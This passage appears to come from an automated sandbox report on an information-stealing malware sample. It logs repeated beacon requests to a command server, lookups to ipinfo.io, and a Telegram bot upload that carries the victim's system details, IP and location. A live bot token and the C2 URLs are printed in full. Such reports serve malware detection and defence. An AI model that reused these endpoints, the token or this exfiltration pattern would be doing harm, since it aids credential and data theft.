p1dJNETpV1QNl2bql0aaR0TtJkaZJTRqlFaGdVTsZEVPFTSykFbWpWTshGRNdXRq5UMjpXWsJEVZBTRX9UaK1mWyk0QMlWVD10dFpWS2k0QNFTUU1kMZRkTyUEVPtmU610dJ1mW6llaaBzZU5ENRd1TqZkaaBTQUlFaa1mTsZlaORTV61Ua3lWSvkUaPlWUql1MV1WWqZ1VNpmV61kMBpnTrxGVNpmSH9UbSdkTyklMNhXTUpVeVRVTzkFVNRTWH90MnpWSzlUeQl2bql0dnRkWxE1RadXRE1UeVR0T1UlMZhmUy4UbCRlW0U1VZhXRy00MNpmT0kVbOBzaU10akRUT4l0QMlWTYJ2ZFpmTp9maJRzZU5Uaa1WTw0kaZpmVX10MJJTT5F1RaJTRyk1aGpmTsJlMOxmUtpVaO1mTsJkeO1mUql1aKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJhkTwQFRKpWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElE
bOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpNGROpXV610dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiIjNWYmZmYkJmMzYDMxUDM1QWO2E2MmVWOxgjYjlTZjNDNiZGO3UjN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: monrul3t.beget.tech
              Source: global trafficDNS traffic detected: DNS query: ipinfo.io
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: unknownHTTP traffic detected: POST /bot7170051875:AAE6pL_pl17E85H-TlJS2rKEh_uqVfRc8Gk/sendPhoto?chat_id=5922069347&caption=%E2%9D%95%20Pipavsya%20%E2%9D%95%0A%E2%80%A2%20ID%3A%202068c5dd94a8a9c670748c61bdf89871812759c4%0A%E2%80%A2%20Comment%3A%20%0A%0A%E2%80%A2%20User%20Name%3A%20user%0A%E2%80%A2%20PC%20Name%3A%20035347%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%208.46.123.189%0A%E2%80%A2%20GEO%3A%20US%20%2F%20New%20York%20City%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CRecovery%5CIdle.exe HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3253052978f8Host: api.telegram.orgContent-Length: 696321Expect: 100-continueConnection: Keep-Alive
              Source: Idle.exe, 0000001E.00000002.4123458318.00000000028B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://monrul3t.beget.tech
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://monrul3t.beget.tech/
              Source: Idle.exe, 0000001E.00000002.4123458318.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4123458318.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://monrul3t.beget.tech/c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Zt
              Source: Idle.exe, 0000001E.00000002.4214301657.000000001DA33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.a.0/sTy#n
              Source: Idle.exe, 0000001E.00000002.4214301657.000000001DA33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c.0/ti
              Source: Idle.exe, 0000001E.00000002.4214301657.000000001DA33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.hotosh#n
              Source: Idle.exe, 0000001E.00000002.4214301657.000000001DA33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adoraw-se#n
              Source: Idle.exe, 0000001E.00000002.4214301657.000000001DA33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.photo/#n
              Source: System.exe, 00000004.00000002.1800682479.0000000003061000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4123458318.0000000002591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: Idle.exe, 0000001E.00000002.4141030211.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012699000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012A09000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012971000.00000004.00000800.00020000.00000000.sdmp, 3ADQ97D0F6.30.dr, s826aptdcS.30.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: Idle.exe, 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: Idle.exe, 0000001E.00000002.4141030211.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012699000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012A09000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012971000.00000004.00000800.00020000.00000000.sdmp, 3ADQ97D0F6.30.dr, s826aptdcS.30.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: Idle.exe, 0000001E.00000002.4141030211.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012699000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012A09000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012971000.00000004.00000800.00020000.00000000.sdmp, 3ADQ97D0F6.30.dr, s826aptdcS.30.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: Idle.exe, 0000001E.00000002.4141030211.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012699000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012A09000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012971000.00000004.00000800.00020000.00000000.sdmp, 3ADQ97D0F6.30.dr, s826aptdcS.30.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: Idle.exe, 0000001E.00000002.4141030211.00000000128A0000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012699000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012A09000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 0000001E.00000002.4141030211.0000000012971000.00000004.00000800.00020000.00000000.sdmp, 3ADQ97D0F6.30.dr, s826aptdcS.30.drString found in binary or memory: https://duckduckgo.com/ac/?q=
